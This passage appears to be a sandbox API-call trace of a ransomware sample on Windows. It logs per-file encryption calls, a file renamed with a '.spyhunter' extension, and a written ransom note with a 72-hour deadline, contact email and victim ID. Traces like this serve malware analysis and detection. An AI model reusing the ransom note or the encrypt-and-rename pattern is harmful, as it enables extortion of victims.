SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.344] WriteFile (in: hFile=0x170, lpBuffer=0x248fd5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fd1c, lpOverlapped=0x0 | out: lpBuffer=0x248fd5c*, lpNumberOfBytesWritten=0x248fd1c*=0x4, lpOverlapped=0x0) returned 1 [0095.344] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fd1c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fd1c*=0x30, lpOverlapped=0x0) returned 1 [0095.344] CloseHandle (hObject=0x170) returned 1 [0095.345] GetProcessHeap () returned 0x2c0000 [0095.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0095.345] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.spyhunter") returned 67 [0095.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.spyhunter" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.spyhunter")) returned 1 [0095.346] GetProcessHeap () returned 0x2c0000 [0095.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0095.346] GetProcessHeap () returned 0x2c0000 [0095.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.346] GetProcessHeap () returned 0x2c0000 [0095.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ca58 | out: hHeap=0x2c0000) returned 1 [0095.346] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd58 | out: pbBuffer=0x248fd58) returned 1 [0095.346] GetProcessHeap () returned 0x2c0000 [0095.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.346] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd50*=0x30) returned 1 [0095.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll" (normalized: "c:\\program files\\internet explorer\\pdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.347] GetProcessHeap () returned 0x2c0000 [0095.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.347] GetProcessHeap () returned 0x2c0000 [0095.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330e90 | out: hHeap=0x2c0000) returned 1 [0095.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd58 | out: pbBuffer=0x248fd58) returned 1 [0095.347] GetProcessHeap () returned 0x2c0000 [0095.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd50*=0x30) returned 1 [0095.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.347] GetProcessHeap () returned 0x2c0000 [0095.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.347] GetProcessHeap () returned 0x2c0000 [0095.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d6e0 | out: hHeap=0x2c0000) returned 1 [0095.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd50 | out: pbBuffer=0x248fd50) returned 1 [0095.347] GetProcessHeap () returned 0x2c0000 [0095.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd48*=0x30) returned 1 [0095.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.348] GetProcessHeap () returned 0x2c0000 [0095.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.348] GetProcessHeap () returned 0x2c0000 [0095.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32a000 | out: hHeap=0x2c0000) returned 1 [0095.348] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd50 | out: pbBuffer=0x248fd50) returned 1 [0095.348] GetProcessHeap () returned 0x2c0000 [0095.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd48*=0x30) returned 1 [0095.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.348] GetProcessHeap () returned 0x2c0000 [0095.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.348] GetProcessHeap () returned 0x2c0000 [0095.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c998 | out: hHeap=0x2c0000) returned 1 [0095.348] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd48 | out: pbBuffer=0x248fd48) returned 1 [0095.348] GetProcessHeap () returned 0x2c0000 [0095.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd40*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd40*=0x30) returned 1 [0095.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8d8 | out: hHeap=0x2c0000) returned 1 [0095.349] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd48 | out: pbBuffer=0x248fd48) returned 1 [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.349] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd40*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd40*=0x30) returned 1 [0095.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d630 | out: hHeap=0x2c0000) returned 1 [0095.349] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd40 | out: pbBuffer=0x248fd40) returned 1 [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.349] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd38*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd38*=0x30) returned 1 [0095.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.349] GetProcessHeap () returned 0x2c0000 [0095.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d580 | out: hHeap=0x2c0000) returned 1 [0095.350] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd40 | out: pbBuffer=0x248fd40) returned 1 [0095.350] GetProcessHeap () returned 0x2c0000 [0095.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.350] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd38*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd38*=0x30) returned 1 [0095.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.350] GetProcessHeap () returned 0x2c0000 [0095.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.350] GetProcessHeap () returned 0x2c0000 [0095.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d4d0 | out: hHeap=0x2c0000) returned 1 [0095.350] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd38 | out: pbBuffer=0x248fd38) returned 1 [0095.350] GetProcessHeap () returned 0x2c0000 [0095.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.350] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd30*=0x30) returned 1 [0095.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.351] GetProcessHeap () returned 0x2c0000 [0095.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.351] GetProcessHeap () returned 0x2c0000 [0095.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d420 | out: hHeap=0x2c0000) returned 1 [0095.351] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd38 | out: pbBuffer=0x248fd38) returned 1 [0095.351] GetProcessHeap () returned 0x2c0000 [0095.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.351] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd30*=0x30) returned 1 [0095.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.351] GetProcessHeap () returned 0x2c0000 [0095.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.351] GetProcessHeap () returned 0x2c0000 [0095.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329e90 | out: hHeap=0x2c0000) returned 1 [0095.351] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd30 | out: pbBuffer=0x248fd30) returned 1 [0095.351] GetProcessHeap () returned 0x2c0000 [0095.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd28*=0x30) returned 1 [0095.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.352] GetProcessHeap () returned 0x2c0000 [0095.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.352] GetProcessHeap () returned 0x2c0000 [0095.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d370 | out: hHeap=0x2c0000) returned 1 [0095.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd30 | out: pbBuffer=0x248fd30) returned 1 [0095.352] GetProcessHeap () returned 0x2c0000 [0095.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd28*=0x30) returned 1 [0095.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.352] GetProcessHeap () returned 0x2c0000 [0095.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.352] GetProcessHeap () returned 0x2c0000 [0095.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d2c0 | out: hHeap=0x2c0000) returned 1 [0095.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd28 | out: pbBuffer=0x248fd28) returned 1 [0095.352] GetProcessHeap () returned 0x2c0000 [0095.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd20*=0x30) returned 1 [0095.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files\\internet explorer\\iecompat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.353] GetProcessHeap () returned 0x2c0000 [0095.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.353] GetProcessHeap () returned 0x2c0000 [0095.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d210 | out: hHeap=0x2c0000) returned 1 [0095.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd28 | out: pbBuffer=0x248fd28) returned 1 [0095.353] GetProcessHeap () returned 0x2c0000 [0095.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd20*=0x30) returned 1 [0095.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.353] GetProcessHeap () returned 0x2c0000 [0095.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.353] GetProcessHeap () returned 0x2c0000 [0095.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cc98 | out: hHeap=0x2c0000) returned 1 [0095.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd20 | out: pbBuffer=0x248fd20) returned 1 [0095.354] GetProcessHeap () returned 0x2c0000 [0095.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.354] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd18*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd18*=0x30) returned 1 [0095.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.354] GetProcessHeap () returned 0x2c0000 [0095.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.354] GetProcessHeap () returned 0x2c0000 [0095.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d160 | out: hHeap=0x2c0000) returned 1 [0095.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\internet explorer\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0095.355] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0095.355] WriteFile (in: hFile=0x170, lpBuffer=0x248fc53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fd7c, lpOverlapped=0x0 | out: lpBuffer=0x248fc53*, lpNumberOfBytesWritten=0x248fd7c*=0x127, lpOverlapped=0x0) returned 1 [0095.356] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0095.356] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fd7c*=0x2ac, lpOverlapped=0x0) returned 1 [0095.356] CloseHandle (hObject=0x170) returned 1 [0095.356] GetProcessHeap () returned 0x2c0000 [0095.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32da68 | out: hHeap=0x2c0000) returned 1 [0095.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd18 | out: pbBuffer=0x248fd18) returned 1 [0095.356] GetProcessHeap () returned 0x2c0000 [0095.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd10*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd10*=0x30) returned 1 [0095.356] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.357] GetProcessHeap () returned 0x2c0000 [0095.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.357] GetProcessHeap () returned 0x2c0000 [0095.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358200 | out: hHeap=0x2c0000) returned 1 [0095.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd18 | out: pbBuffer=0x248fd18) returned 1 [0095.357] GetProcessHeap () returned 0x2c0000 [0095.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.357] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd10*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd10*=0x30) returned 1 [0095.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilercore.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.357] GetProcessHeap () returned 0x2c0000 [0095.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.357] GetProcessHeap () returned 0x2c0000 [0095.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358610 | out: hHeap=0x2c0000) returned 1 [0095.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd10 | out: pbBuffer=0x248fd10) returned 1 [0095.358] GetProcessHeap () returned 0x2c0000 [0095.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd08*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd08*=0x30) returned 1 [0095.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdebuggeride.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.358] GetProcessHeap () returned 0x2c0000 [0095.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.358] GetProcessHeap () returned 0x2c0000 [0095.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0095.358] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd10 | out: pbBuffer=0x248fd10) returned 1 [0095.358] GetProcessHeap () returned 0x2c0000 [0095.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd08*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd08*=0x30) returned 1 [0095.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdbgui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.358] GetProcessHeap () returned 0x2c0000 [0095.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.358] GetProcessHeap () returned 0x2c0000 [0095.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d810 | out: hHeap=0x2c0000) returned 1 [0095.358] 